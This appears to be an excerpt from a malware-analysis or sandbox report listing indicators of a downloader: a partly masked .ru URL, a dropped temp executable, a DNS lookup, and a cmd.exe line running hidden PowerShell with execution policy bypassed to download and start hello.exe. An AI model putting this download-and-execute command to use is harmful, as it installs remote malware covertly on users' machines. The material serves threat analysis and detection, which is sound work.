Technical Information
- http://ss#####euegsgrfnu.ru/hello.exe?gv##### as %localappdata%\tempbxa52.exe
- %LOCALAPPDATA%\tempbxa52.exe
- DNS ASK ss#####euegsgrfnu.ru
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://ss#####euegsgrfnu.ru/hello.exe?Gv########################## & stArT %teMp%B...' (with hidden window)